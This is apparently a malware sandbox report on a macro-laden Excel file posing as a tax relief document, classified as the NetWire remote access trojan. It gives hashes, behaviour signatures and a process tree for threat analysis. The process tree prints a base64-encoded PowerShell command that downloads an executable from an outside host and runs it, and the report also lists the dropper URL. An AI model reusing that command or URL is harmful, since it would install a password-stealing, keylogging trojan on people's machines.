netwire | adb2126ab8201d688d9569a05f08fd1738bf80302d46ef2aa83eb2fc7eb94203

General

Target

ATO-RELIEF.xlsm
Size

15KB
MD5

8deb8023b4cabeaf6cb46a4e4b1ebc25
SHA1

09ac5fdc3cad359f1e35f98b15d481ccfe01af30
SHA256

adb2126ab8201d688d9569a05f08fd1738bf80302d46ef2aa83eb2fc7eb94203
SHA512

3cc1240c2a206d7572bac182117d742dee94af585c5384aebbc4621abf32e7e6db2e6e39f4cff2d262d511cf847b06be57a4a6eab6f5e84321f9cc538e630488

Score

10^/10

netwire botnet rat stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://adelantosi.com/cp/TAX-RELIEF.exe

Signatures

NetWire RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3212-21-0x0000000000400000-0x0000000000433000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4164	4684	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

21 3860 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

qEMFs.exeqEMFs.exe

pid process

4488 qEMFs.exe
3212 qEMFs.exe
Loads dropped DLL 1 IoCs

Processes:

qEMFs.exe

pid process

4488 qEMFs.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

qEMFs.exe

description pid process target process

PID 4488 set thread context of 3212 4488 qEMFs.exe qEMFs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
21	3860	powershell.exe

pid	process
4488	qEMFs.exe
3212	qEMFs.exe

pid	process
4488	qEMFs.exe

description	pid	process	target process
PID 4488 set thread context of 3212	4488	qEMFs.exe	qEMFs.exe

NSIS installer 6 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\qEMFs.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\qEMFs.exe	nsis_installer_2
C:\Users\Admin\AppData\Roaming\qEMFs.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\qEMFs.exe	nsis_installer_2
C:\Users\Admin\AppData\Roaming\qEMFs.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\qEMFs.exe	nsis_installer_2

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4684 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exeqEMFs.exe

pid	process
3860	powershell.exe
3860	powershell.exe
3860	powershell.exe
4488	qEMFs.exe
4488	qEMFs.exe
4488	qEMFs.exe
4488	qEMFs.exe
4488	qEMFs.exe
4488	qEMFs.exe
4488	qEMFs.exe
4488	qEMFs.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

qEMFs.exe

pid process

4488 qEMFs.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3860 powershell.exe

pid	process
4488	qEMFs.exe

description	pid	process
Token: SeDebugPrivilege	3860	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE
4684	EXCEL.EXE

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeqEMFs.exe

description	pid	process	target process
PID 4684 wrote to memory of 4164	4684	EXCEL.EXE	cmd.exe
PID 4684 wrote to memory of 4164	4684	EXCEL.EXE	cmd.exe
PID 4164 wrote to memory of 3860	4164	cmd.exe	powershell.exe
PID 4164 wrote to memory of 3860	4164	cmd.exe	powershell.exe
PID 3860 wrote to memory of 4488	3860	powershell.exe	qEMFs.exe
PID 3860 wrote to memory of 4488	3860	powershell.exe	qEMFs.exe
PID 3860 wrote to memory of 4488	3860	powershell.exe	qEMFs.exe
PID 4488 wrote to memory of 3212	4488	qEMFs.exe	qEMFs.exe
PID 4488 wrote to memory of 3212	4488	qEMFs.exe	qEMFs.exe
PID 4488 wrote to memory of 3212	4488	qEMFs.exe	qEMFs.exe
PID 4488 wrote to memory of 3212	4488	qEMFs.exe	qEMFs.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ATO-RELIEF.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4684

C:\Windows\SYSTEM32\cmd.exe
cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQBkAGUAbABhAG4AdABvAHMAaQAuAGMAbwBtAC8AYwBwAC8AVABBAFgALQBSAEUATABJAEUARgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAcQBFAE0ARgBzAC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAcQBFAE0ARgBzAC4AZQB4AGUA
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQBkAGUAbABhAG4AdABvAHMAaQAuAGMAbwBtAC8AYwBwAC8AVABBAFgALQBSAEUATABJAEUARgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAcQBFAE0ARgBzAC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAcQBFAE0ARgBzAC4AZQB4AGUA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3860

C:\Users\Admin\AppData\Roaming\qEMFs.exe
"C:\Users\Admin\AppData\Roaming\qEMFs.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4488

C:\Users\Admin\AppData\Roaming\qEMFs.exe
"C:\Users\Admin\AppData\Roaming\qEMFs.exe"
5⤵
- Executes dropped EXE
PID:3212

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\qEMFs.exe
MD5
307e257292be5d47304c1712c8bd1342

SHA1
b22e2b425e3a663f7404579ebf03507713b45959

SHA256
31a804fddf5f1ed1d5c1a69772bc92026f90696a6903a3a7ebaf7aef6dfa9478

SHA512
8496a01a16daa648eb802d3b5ad5e06fb431202f6681afe53f6ab4c7876018169d86963574b7202e7c8653e586df64f280a21432fd4cc3ad82a97b4825db522f

Download Submit
C:\Users\Admin\AppData\Roaming\qEMFs.exe
MD5
307e257292be5d47304c1712c8bd1342

SHA1
b22e2b425e3a663f7404579ebf03507713b45959

SHA256
31a804fddf5f1ed1d5c1a69772bc92026f90696a6903a3a7ebaf7aef6dfa9478

SHA512
8496a01a16daa648eb802d3b5ad5e06fb431202f6681afe53f6ab4c7876018169d86963574b7202e7c8653e586df64f280a21432fd4cc3ad82a97b4825db522f

Download Submit
C:\Users\Admin\AppData\Roaming\qEMFs.exe
MD5
307e257292be5d47304c1712c8bd1342

SHA1
b22e2b425e3a663f7404579ebf03507713b45959

SHA256
31a804fddf5f1ed1d5c1a69772bc92026f90696a6903a3a7ebaf7aef6dfa9478

SHA512
8496a01a16daa648eb802d3b5ad5e06fb431202f6681afe53f6ab4c7876018169d86963574b7202e7c8653e586df64f280a21432fd4cc3ad82a97b4825db522f

Download Submit
\Users\Admin\AppData\Local\Temp\nsr4AAC.tmp\abxq191c.dll
MD5
ba26ab4b2985a5af1ac235659010c85e

SHA1
06c00b2bb76b1cbe07b0708ca34a3084aec48eb5

SHA256
aedf7b32123d8b8a6a2bf5a5c58b02aef9adee2a88bc0fb070bc1d034200ae07

SHA512
0121feb31715a882d0ad283aef6258436c8d31d79ebd4a163135f0bcfba6ec51c5c4164b7fad8425f1a64365b67a75b59118a5a7be2e0ee655c7f5e4bb6c2081

Download Submit
memory/3212-21-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/3212-19-0x000000000040242D-mapping.dmp

Download
memory/3860-12-0x0000029297493000-0x0000029297495000-memory.dmp

Filesize
8KB

Download
memory/3860-10-0x0000029297900000-0x0000029297901000-memory.dmp

Filesize
4KB

Download
memory/3860-11-0x0000029297490000-0x0000029297492000-memory.dmp

Filesize
8KB

Download
memory/3860-9-0x00007FFEE0A70000-0x00007FFEE145C000-memory.dmp

Filesize
9.9MB

Download
memory/3860-13-0x00000292AFD00000-0x00000292AFD01000-memory.dmp

Filesize
4KB

Download
memory/3860-14-0x0000029297496000-0x0000029297498000-memory.dmp

Filesize
8KB

Download
memory/3860-8-0x0000000000000000-mapping.dmp

Download
memory/4164-7-0x0000000000000000-mapping.dmp

Download
memory/4488-15-0x0000000000000000-mapping.dmp

Download
memory/4684-2-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmp

Filesize
64KB

Download
memory/4684-6-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmp

Filesize
64KB

Download
memory/4684-5-0x00007FFEEB320000-0x00007FFEEB957000-memory.dmp

Filesize
6.2MB

Download
memory/4684-4-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmp

Filesize
64KB

Download
memory/4684-3-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads